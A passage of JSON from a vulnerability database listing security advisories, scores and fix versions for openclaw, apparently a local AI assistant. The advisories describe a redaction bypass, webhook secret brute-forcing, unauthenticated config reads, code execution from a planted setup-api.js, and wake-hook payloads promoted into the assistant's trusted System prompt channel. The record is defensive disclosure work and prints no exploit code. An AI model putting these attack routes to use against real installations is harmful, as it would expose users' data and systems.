                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T14:10:57Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/86734ef93a2f25063371b04f1946eb300548acd4"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/pull/66030",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/pull/66030"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-8372-7vhw-cm6q",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T14:10:57Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-8372-7vhw-cm6q"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43528",
                    "reference_id": "CVE-2026-43528",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43528"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-8372-7vhw-cm6q",
                    "reference_id": "GHSA-8372-7vhw-cm6q",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-8372-7vhw-cm6q"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-redaction-bypass-via-sourceconfig-and-runtimeconfig-aliases",
                    "reference_id": "openclaw-redaction-bypass-via-sourceconfig-and-runtimeconfig-aliases",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T14:10:57Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-redaction-bypass-via-sourceconfig-and-runtimeconfig-aliases"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109967?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.14",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.14"
                }
            ],
            "aliases": [
                "CVE-2026-43528",
                "GHSA-8372-7vhw-cm6q"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-dfdk-dhwf-9yaj"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90865?format=api",
            "vulnerability_id": "VCID-djqx-bwuu-4uc1",
            "summary": "OpenClaw: Telegram Webhook Missing Guess Rate Limiting Enables Brute-Force Guessing of Weak Webhook Secret\n## Summary\n\nThe Telegram webhook did not rate-limit repeated secret guesses, which enables brute-force guessing of a weak webhook secret.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nTelegram webhook auth previously rejected bad secrets but did not throttle repeated guesses, allowing brute-force attempts against weak webhook secrets. Commit `c2c136ae9517ddd0789d742a0fdf4c10e8c729a7` adds repeated-guess throttling before auth failure responses.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `c2c136ae9517ddd0789d742a0fdf4c10e8c729a7`.\n\n## Fix Commit(s)\n\n- `c2c136ae9517ddd0789d742a0fdf4c10e8c729a7`\n\n## Release Process Note\n\n`2026.3.25` is the next planned OpenClaw release version in `package.json`. This advisory is being published ahead of that npm release so the draft is no longer blocked; once `2026.3.25` is published, the structured patched-version metadata will match the released artifact.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35628",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00071",
                            "scoring_system": "epss",
                            "scoring_elements": "0.21947",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00071",
                            "scoring_system": "epss",
                            "scoring_elements": "0.21996",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00071",
                            "scoring_system": "epss",
                            "scoring_elements": "0.2201",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35628"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/c2c136ae9517ddd0789d742a0fdf4c10e8c729a7",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:14:25Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/c2c136ae9517ddd0789d742a0fdf4c10e8c729a7"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vcx4-4qxg-mfp4",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:14:25Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vcx4-4qxg-mfp4"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35628",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35628"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-telegram-webhook-rate-limiting",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:14:25Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-telegram-webhook-rate-limiting"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-vcx4-4qxg-mfp4",
                    "reference_id": "GHSA-vcx4-4qxg-mfp4",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-vcx4-4qxg-mfp4"
                }
            ],
            "fixed_packages": [],
            "aliases": [
                "CVE-2026-35628",
                "GHSA-vcx4-4qxg-mfp4"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-djqx-bwuu-4uc1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90015?format=api",
            "vulnerability_id": "VCID-dmse-bb22-rkcj",
            "summary": "OpenClaw: Authenticated `/hooks/wake` and mapped `wake` payloads are promoted into the trusted `System:` prompt channel\n## Impact\n\nAuthenticated `/hooks/wake` and mapped `wake` payloads are promoted into the trusted `System:` prompt channel.\n\nAn authenticated wake hook or mapped wake payload could be promoted into the trusted System prompt channel instead of an untrusted event.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.2`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @tdjackey for reporting.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jf56-mccx-5f3f",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jf56-mccx-5f3f"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-jf56-mccx-5f3f",
                    "reference_id": "GHSA-jf56-mccx-5f3f",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-jf56-mccx-5f3f"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.8",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2g7x-vu14-nkde"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dqb2-dej7-augt"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-wyat-1259-2kg9"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"
                }
            ],
            "aliases": [
                "GHSA-jf56-mccx-5f3f"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-dmse-bb22-rkcj"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/94834?format=api",
            "vulnerability_id": "VCID-dv5s-pvw1-a7fu",
            "summary": "OpenClaw vulnerable to arbitrary code execution via attacker-controlled setup-api.js loaded from cwd during env-key resolution\n## Summary\n\nOpenClaw's bundled plugin setup resolver could fall back to `process.cwd()` while resolving provider setup metadata. If a user ran an OpenClaw command from an attacker-controlled repository containing `extensions/<plugin>/setup-api.js`, OpenClaw could load and execute that JavaScript during ordinary provider/model status resolution.\n\n## Impact\n\nThis is arbitrary JavaScript execution in the OpenClaw process under the current user account. A malicious repository could run code when the user executed commands such as provider/model inspection from that directory. The issue does not require gateway network exposure, but it does require user interaction: the user must run OpenClaw from a directory containing the attacker-controlled setup file.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` on npm\n- Affected: versions before `2026.4.23`\n- Fixed: `2026.4.23`\n- Latest stable verified fixed: `openclaw@2026.4.23`, tag `v2026.4.23`\n\n## Fix\n\nOpenClaw now resolves bundled setup fallbacks only from the canonical package/repository root and no longer includes `process.cwd()` as a trusted setup-api search root. A regression test verifies that a workspace-local `extensions/<plugin>/setup-api.js` is not loaded through provider setup resolution.\n\n## Fix Commit(s)\n\n- `993781e6e6eaf50f033cfc3e3bf4f47059740707` (`fix(plugins): ignore cwd setup-api fallback`)\n\n## Severity\n\nSeverity remains `high` because successful exploitation allows arbitrary code execution under the user running OpenClaw. The CVSS vector is local/user-interaction scoped rather than network-only because the victim must run OpenClaw from an attacker-controlled directory.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45004",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00014",
                            "scoring_system": "epss",
                            "scoring_elements": "0.0286",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00014",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02815",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00014",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02869",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45004"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/993781e6e6eaf50f033cfc3e3bf4f47059740707",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-11T18:30:14Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/993781e6e6eaf50f033cfc3e3bf4f47059740707"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-r39h-4c2p-3jxp",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "8.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-11T18:30:14Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-r39h-4c2p-3jxp"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45004",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45004"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-setup-api-js-in-current-working-directory",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-11T18:30:14Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-setup-api-js-in-current-working-directory"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-r39h-4c2p-3jxp",
                    "reference_id": "GHSA-r39h-4c2p-3jxp",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-r39h-4c2p-3jxp"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/114733?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.23",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.23"
                }
            ],
            "aliases": [
                "CVE-2026-45004",
                "GHSA-r39h-4c2p-3jxp"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-dv5s-pvw1-a7fu"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/93521?format=api",
            "vulnerability_id": "VCID-e25p-j5ed-yqfz",
            "summary": "OpenClaw's Gateway Control UI bootstrap config required Gateway auth\n## Summary\nThe Gateway Control UI bootstrap config endpoint should have required Gateway auth, but it could be read without it.\n\n## Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.21\n- Fixed version: 2026.4.22\n\n## Impact\nWhen Gateway authentication was enabled, the Control UI bootstrap config endpoint could still be read without a valid Gateway token. That response could expose sensitive bootstrap/config fields intended only for authenticated Control UI sessions.\n\n## Fix\nThe bootstrap config route now goes through the same Gateway read-auth path as other authenticated Control UI reads. Regression tests cover unauthenticated rejection, valid-token access, and basePath handling.\n\n## Fix Commit(s)\n- 2321d67263bc710e357644d59f746b08d891051b\n\n## Verification\n- The fix commit is contained in the public v2026.4.22 tag.\n- openclaw@2026.4.22 is published on npm and the compiled package contains the fix.\n- Focused regression coverage for this path passed before publication.\n\nOpenClaw thanks @zsxsoft for reporting.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
